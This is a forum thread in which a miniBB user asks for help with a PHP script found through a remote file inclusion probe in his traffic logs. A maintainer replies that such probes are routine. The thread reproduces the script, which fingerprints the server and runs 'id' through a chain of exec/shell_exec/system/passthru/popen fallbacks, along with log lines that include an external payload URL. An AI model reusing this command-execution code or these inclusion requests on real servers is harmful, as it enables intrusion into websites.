Hi guys! I am using minibb for a year now, recently started to notice some weird traffic from xxx content sites. I checked the referrers of the link, and there was one strange bit of php, that i am not strong to understand, maybe somebody knows what can it be?


$dir = @getcwd();
$ker = @php_uname();
echo "31337<br>";
$OS = @PHP_OS;
echo "<br>OSTYPE:$OS<br>";
echo "<br>Kernel:$ker<br>";
$free = disk_free_space($dir);

if ($free === FALSE) {$free = 0;}
if ($free < 0) {$free = 0;}
echo "Free:".view_size($free)."<br>";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){

$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);

}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);

$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;

}
function view_size($size)
{
if (!is_numeric($size)) {return FALSE;}
else
{
if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}

elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
else {$size = $size . " B";}
return $size;

Hmm, I nearly understand what this code is about, but I don't understand where you've got it from. XXX Traffic? This data can not be executed in referrers I suppose...

Hi Paul, thank you for the reply, in my traffic stats i get this:

Host: 80.172.224.21
/forum/eng.php?img=http://usuarios.arnet.com.ar/larry123/safe.txt?
Http Code: 404 Date: Sep 28 04:34:49 Http Version: HTTP/1.1 Size in Bytes: -
Referer: -
Agent: libwww-perl/5.808

if you remove the ? mark at the end of safe.txt you will get what i posted before.
I don't want to know exactly what it does, i just want to know if I should worry about something or not? is my forum under attack or it was hacked:)

Spasibo anyway, i know it's probably not your business, just thought it would be interesting.

ah ok i found some info about it http://www.ossec.net/wiki/index.php/WebAttacks_links#Sites_with_PHP.2FPerl_scripts

Well, I could say only miniBB traffic is full of such stuff and even more :-)

For example from our logs (minibbtest):

/http://indir.savsak.com/shell.txt

minibb-test.php+[plm=0]+get+http://
minibb.org/minibb-test.php+[0,33753,33538]+->+[n]+post+http://minibb.org/minibb-test.php

/testhttp://www.cherepitsa.ru/administrator/components/com_remository/images/check.txt

The hackers will send such requests always, and there is nothing dangerous until you have safe up-to-date version of PHP, probably mySQL and the latest release of miniBB of course.

The code you are reffering in that case will try to execute on the malicious server and provide some info about this server to the hacker, like disk space available and system information. I suppose this code does nothing dangerous and just checks. It works probably only if there's some hole in PHP root code which has been discovered in the past.

You could check your system for the basic security executing _install.php file which comes by default in miniBB package, with the 'analysis' parameter, i.e.

_install.php?analysis

It should give information regarding PHP version, register_globals, safe_mode and vulnerable folder. These are the basic things to know to be protected.

I think having just what you see in your logs is not reason of worrying. But if you see some strange unknown files under your forums folder which do not come by default with miniBB, it is worth to investigate where they come from.

Thank you very much Paul!
Spasibo Bolshoye:)